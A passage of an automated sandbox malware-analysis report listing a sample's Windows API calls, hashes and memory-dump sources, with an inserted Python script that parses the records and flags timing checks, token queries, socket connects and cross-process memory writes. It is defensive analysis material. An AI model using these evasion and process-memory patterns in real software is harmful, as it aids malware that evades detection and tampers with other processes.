                                                        • Opcode Fuzzy Hash: 7bd4fcf377c2e72935876093e62e55b50918a1a3e474ce529a08d39343a738d4
                                                        • Instruction Fuzzy Hash: BB218B71901358FFDB20DF59ED487A97BF9FB10325F58812BE450961A1C37C8892DB58
                                                        APIs
                                                        • __calloc_crt.LIBCMT ref: 00732E81
                                                        • CreateThread.KERNEL32(?,?,00732FB7,00000000,?,?), ref: 00732EC5
                                                        • GetLastError.KERNEL32 ref: 00732ECF
                                                        • _free.LIBCMT ref: 00732ED8
                                                        • __dosmaperr.LIBCMT ref: 00732EE3
                                                          • Part of subcall function 0073889E: __getptd_noexit.LIBCMT ref: 0073889E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                        • String ID:
                                                        • API String ID: 2664167353-0
                                                        • Opcode ID: 38c4f8051ee13f30acd1e82625f16eeb66b00716d265128f17e278a8b6b79cf1
                                                        • Instruction ID: d5896e9e5b95ce90b2c2ede7acc6a141eaa0ee59f2d3364d5fc5827e828b64ee
                                                        • Opcode Fuzzy Hash: 38c4f8051ee13f30acd1e82625f16eeb66b00716d265128f17e278a8b6b79cf1
                                                        • Instruction Fuzzy Hash: 5211C832105706EFF720AFA5DC4ADAB7BA8EF44770F100529F95486153DB39D8028761
                                                        APIs
                                                        • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0074B903
                                                        • GetLastError.KERNEL32(?,0074B3CB,?,?,?), ref: 0074B90D
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,0074B3CB,?,?,?), ref: 0074B91C
                                                        • RtlAllocateHeap.NTDLL(00000000,?,0074B3CB), ref: 0074B923
                                                        • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0074B93A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 883493501-0
                                                        • Opcode ID: 9eb6d43eda8a067c12831a7901975176d613fde94d7c5e87701d71675a0c747f
                                                        • Instruction ID: a4038c43d405eb4f1cf26ff9c156811afb80fc8f211f87eda9cb84736a9f0f91
                                                        • Opcode Fuzzy Hash: 9eb6d43eda8a067c12831a7901975176d613fde94d7c5e87701d71675a0c747f
                                                        • Instruction Fuzzy Hash: 45016971241208BFDB214FA9DC88D6B3BADEF8A7A4B10402AF945C2260DB79DC41DA60
                                                        APIs
                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00758371
                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0075837F
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00758387
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00758391
                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007583CD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                        • String ID:
                                                        • API String ID: 2833360925-0
                                                        • Opcode ID: 2bbd31d2b10662cda25dfc41a119c9b6245d551aebbac6e84aa93450af368d8f
                                                        • Instruction ID: 4f8743625e4b8c8eb2b17f0de5c9eb45fd54f8fceb29ad10f23e8db143ff6613
                                                        • Opcode Fuzzy Hash: 2bbd31d2b10662cda25dfc41a119c9b6245d551aebbac6e84aa93450af368d8f
                                                        • Instruction Fuzzy Hash: 11018031C0161DDBCF10AFA4EC49AEEBB78FF08B02F014046E901B2150DFB89955C7A6
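The per-function records in this listing (the QueryPerformanceCounter/Sleep loop at 00758371, the socket/connect pair at 00769160, and the two-call GetTokenInformation(TokenIntegrityLevel) pattern that follows) are easier to triage programmatically than by eye. The script below is an added example, not Joe Sandbox code and not code from the analysed sample: it parses the report's "APIs" / "Similarity" record layout as it appears in this section and attaches heuristic flags to each record. The flag names, thresholds and the trimmed sample records embedded in it are this example's own assumptions.

```python
"""Parse the per-function API listings of a Joe Sandbox report and flag notable
call patterns. Added example, not Joe Sandbox code nor code from the analysed
sample; record layout and flag rules are assumptions drawn from this section."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

# Constructed sample: three records trimmed from the report's own listing above.
SAMPLE = """\
APIs
• QueryPerformanceCounter.KERNEL32(?,00000000), ref: 00758371
• QueryPerformanceFrequency.KERNEL32(?), ref: 0075837F
• Sleep.KERNEL32(00000000), ref: 00758387
• QueryPerformanceCounter.KERNEL32(?), ref: 00758391
• Sleep.KERNEL32(?,00000000), ref: 007583CD
Memory Dump Source
• Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• API String ID: 2833360925-0
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0074B806
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0074B810
• GetProcessHeap.KERNEL32(00000008,?), ref: 0074B81F
• RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 0074B826
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?), ref: 0074B83C
Similarity
• API ID: HeapInformationToken$AllocateErrorLastProcess
• API String ID: 47921759-0
APIs
  • Part of subcall function 0076ACD3: inet_addr.WS2_32(00000000), ref: 0076ACF5
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00769160
• WSAGetLastError.WS2_32(00000000), ref: 0076916F
• connect.WS2_32(00000000,?,00000010), ref: 0076918B
Similarity
• API ID: ErrorLastconnectinet_addrsocket
• API String ID: 3701255441-0
"""

# "• Api.MODULE(args), ref: ADDR"; args and the comma are optional ("_wcsstr.LIBCMT ref: ...").
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?P<args>\(.*\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
FIELD_RE = re.compile(r"^•\s*(?P<key>API String ID|API ID):\s*(?P<val>.*)$")

# subcall is the callee address when the line reads "Part of subcall function", else None.
ApiCall = namedtuple("ApiCall", "api module args ref subcall")

@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    api_id: str = ""
    api_string_id: str = ""

def parse_records(text):
    """One FunctionRecord per 'APIs' block; dump-source and other lines are skipped."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionRecord()
            records.append(current)
        elif current is not None:
            m, f = API_RE.match(line), FIELD_RE.match(line)
            if m:
                current.calls.append(ApiCall(m["api"], m["mod"], m["args"] or "", m["ref"].upper(), m["sub"]))
            elif f and f["key"] == "API ID":
                current.api_id = f["val"].strip()
            elif f:
                current.api_string_id = f["val"].strip()
    return records

def flag_record(rec):
    """Heuristic flags; the names and thresholds are this example's own."""
    names = [c.api for c in rec.calls]
    flags = []
    # Two QueryPerformanceCounter reads around a Sleep: elapsed-time check (debugger/sandbox timing).
    if names.count("QueryPerformanceCounter") >= 2 and "Sleep" in names:
        flags.append("timing-check")
    # Match the report's annotation, not the printed value: in winnt.h TokenIntegrityLevel is 25
    # and 3 is TokenPrivileges, so the number alone would mislead.
    if any(c.api == "GetTokenInformation" and "TokenIntegrityLevel" in c.args for c in rec.calls):
        flags.append("integrity-level-query")
    # socket(AF_INET=2, SOCK_STREAM=1, IPPROTO_TCP=6) followed by connect: a plain TCP client.
    tcp = any(c.api == "socket" and c.args.startswith("(00000002,00000001,00000006") for c in rec.calls)
    if tcp and "connect" in names:
        flags.append("direct-socket-connect")
    # Same API twice with a heap allocation in between: size probe, allocate, then the real call.
    for api in sorted(set(names)):
        idx = [i for i, n in enumerate(names) if n == api]
        if len(idx) >= 2 and "RtlAllocateHeap" in names[idx[0]:idx[-1]]:
            flags.append("probe-then-allocate:" + api)
    return flags

def analyse(text):
    """Map each record's API String ID to its flags."""
    return {rec.api_string_id: flag_record(rec) for rec in parse_records(text)}
```

Feed it the text of the function listing and `analyse()` returns one entry per record keyed by the report's API String ID, which is the same key the sandbox uses for its own similarity matching. The flags are starting points for review, not verdicts: a timing loop around Sleep is equally at home in a benign runtime, and the probe-then-allocate shape is simply how a correct caller sizes a variable-length buffer.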
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0074B806
                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0074B810
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0074B81F
                                                        • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 0074B826
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0074B83C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 47921759-0
                                                        • Opcode ID: 6842d1a89014fb8da9871759ee5e235b08b19be785b3b4ac8f0be0771e307171
                                                        • Instruction ID: b66d89cf06ff5618be8464acb034041b7d33a66e58a229502ca007a856b062b2
                                                        • Opcode Fuzzy Hash: 6842d1a89014fb8da9871759ee5e235b08b19be785b3b4ac8f0be0771e307171
                                                        • Instruction Fuzzy Hash: 4BF04F75281204AFEB215FA5EC88E773B6CFF46755F00402AF941C7150DB69DC52CAA0
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0074B7A5
                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0074B7AF
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0074B7BE
                                                        • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0074B7C5
                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0074B7DB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 47921759-0
                                                        • Opcode ID: 6a0e413c2ee25ab967e830cd68dde6e8be34fc567dfd75f1bdba0b9d5acc3a36
                                                        • Instruction ID: 27c7103676a24e6ecad61a93cb9186dd4d8be15534ad607d03ab0481d9c7cb08
                                                        • Opcode Fuzzy Hash: 6a0e413c2ee25ab967e830cd68dde6e8be34fc567dfd75f1bdba0b9d5acc3a36
                                                        • Instruction Fuzzy Hash: 3DF03C71241208AFEB211FA5AC89E673BACFF86755F10801BF941C6150DB79DC42CA60
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003E9), ref: 0074FA8F
                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 0074FAA6
                                                        • MessageBeep.USER32(00000000), ref: 0074FABE
                                                        • KillTimer.USER32(?,0000040A), ref: 0074FADA
                                                        • EndDialog.USER32(?,00000001), ref: 0074FAF4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                        • String ID:
                                                        • API String ID: 3741023627-0
                                                        • Opcode ID: 5f3fe0db7ce20cbc0bc4094c0ed917aec007dcf9fe483c5c75abe295434fef26
                                                        • Instruction ID: 3ccb5f789ee739e41cc21c7c7b435e7e053746f8dc6706fc08922ca705b62df1
                                                        • Opcode Fuzzy Hash: 5f3fe0db7ce20cbc0bc4094c0ed917aec007dcf9fe483c5c75abe295434fef26
                                                        • Instruction Fuzzy Hash: 4A018130600704ABEB349B14DD4EBD677B8BB01B09F04816AF287A51E0DBF8AD95CB54
                                                        APIs
                                                        • EndPath.GDI32(?), ref: 0072B526
                                                        • StrokeAndFillPath.GDI32(?,?,0078F583,00000000,?), ref: 0072B542
                                                        • SelectObject.GDI32(?,00000000), ref: 0072B555
                                                        • DeleteObject.GDI32 ref: 0072B568
                                                        • StrokePath.GDI32(?), ref: 0072B583
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                        • String ID:
                                                        • API String ID: 2625713937-0
                                                        • Opcode ID: 9470f14f3a93113693ddea3b13069e9f528330aa915461dc184b8e840510eb59
                                                        • Instruction ID: da82c30cb247bb062ee8b3d5b2e820bea711e8f3c21f3cae78410c675d2ae0e4
                                                        • Opcode Fuzzy Hash: 9470f14f3a93113693ddea3b13069e9f528330aa915461dc184b8e840510eb59
                                                        • Instruction Fuzzy Hash: 86F0C431141348ABDB259F2AED0C7643FF6AB01332F58C216E4A9491F1C73C99A6EF18
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 0075FAB2
                                                        • CoCreateInstance.COMBASE(0079DA7C,00000000,00000001,0079D8EC,?), ref: 0075FACA
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                        • CoUninitialize.COMBASE ref: 0075FD2D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                                        • String ID: .lnk
                                                        • API String ID: 2683427295-24824748
                                                        • Opcode ID: 0910b48e4f047378c481a046725fd3f9def7c669ef6d64ef493f97cde17c056f
                                                        • Instruction ID: 3317d9a101e7d3500252271385b477d72e68d95c7f84163bb56d7601ddc82f93
                                                        • Opcode Fuzzy Hash: 0910b48e4f047378c481a046725fd3f9def7c669ef6d64ef493f97cde17c056f
                                                        • Instruction Fuzzy Hash: EBA15C71504305AFC300EF68C895EABB7EDEF88704F40891DF55597192EB74EA4ACBA2
                                                        APIs
                                                          • Part of subcall function 007578AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 007578CB
                                                        • CoInitialize.OLE32(00000000), ref: 0075F04D
                                                        • CoCreateInstance.COMBASE(0079DA7C,00000000,00000001,0079D8EC,?), ref: 0075F066
                                                        • CoUninitialize.COMBASE ref: 0075F083
                                                          • Part of subcall function 007184A6: __swprintf.LIBCMT ref: 007184E5
                                                          • Part of subcall function 007184A6: __itow.LIBCMT ref: 00718519
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                        • String ID: .lnk
                                                        • API String ID: 2126378814-24824748
                                                        • Opcode ID: 9b96844fe8b6b09f4ad6690b445d3128e1235a2673f7f8b6ecf46359cbd42274
                                                        • Instruction ID: 89ea74273123c5a87fe06ce512553db104c4f50ac4f4ae30f1a6475c0b695d48
                                                        • Opcode Fuzzy Hash: 9b96844fe8b6b09f4ad6690b445d3128e1235a2673f7f8b6ecf46359cbd42274
                                                        • Instruction Fuzzy Hash: 93A15775604301DFC710DF14C884D9ABBE5BF88320F148999F89A9B3A2CB79ED49CB91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: #$+
                                                        • API String ID: 0-2552117581
                                                        • Opcode ID: 1043867cc9f9d80f8167ac2fec6eccb62d7380b33ddb253f92cff9614ada7480
                                                        • Instruction ID: a8b49084683b13fd6c83d9ccccb68be5455224c5401318dca5d58a76bbb48472
                                                        • Opcode Fuzzy Hash: 1043867cc9f9d80f8167ac2fec6eccb62d7380b33ddb253f92cff9614ada7480
                                                        • Instruction Fuzzy Hash: 15512175048266DFDF25EF68D455AFA7BA4BF2A310F144055F881AB2D0D7BC9C42C760
                                                        APIs
                                                        • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,007ADC40,?,0000000F,0000000C,00000016,007ADC40,?), ref: 0075507B
                                                          • Part of subcall function 007184A6: __swprintf.LIBCMT ref: 007184E5
                                                          • Part of subcall function 007184A6: __itow.LIBCMT ref: 00718519
                                                          • Part of subcall function 0071B8A7: _memmove.LIBCMT ref: 0071B8FB
                                                        • CharUpperBuffW.USER32(?,?,00000000,?), ref: 007550FB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper$__itow__swprintf_memmove
                                                        • String ID: REMOVE$THIS
                                                        • API String ID: 2528338962-776492005
                                                        • Opcode ID: 704e5a41a62b017dfb226ad9f601f148b6ee1a509916e8ee397df9e8cde6778f
                                                        • Instruction ID: fabdd2684dfe04c1e244ad26ec624f819a1e99f8f4159218e5c58351a49dc661
                                                        • Opcode Fuzzy Hash: 704e5a41a62b017dfb226ad9f601f148b6ee1a509916e8ee397df9e8cde6778f
                                                        • Instruction Fuzzy Hash: 9D418134A00A09DFCF14DF68C895AEEBBB5BF48305F048069E856AB392DB789D45CB51
                                                        APIs
                                                          • Part of subcall function 00754D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0074C9FE,?,?,00000034,00000800,?,00000034), ref: 00754D6B
                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0074CFC9
                                                          • Part of subcall function 00754D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0074CA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00754D36
                                                          • Part of subcall function 00754C65: GetWindowThreadProcessId.USER32(?,?), ref: 00754C90
                                                          • Part of subcall function 00754C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0074C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00754CA0
                                                          • Part of subcall function 00754C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0074C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00754CB6
                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0074D036
                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0074D083
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                        • String ID: @
                                                        • API String ID: 4150878124-2766056989
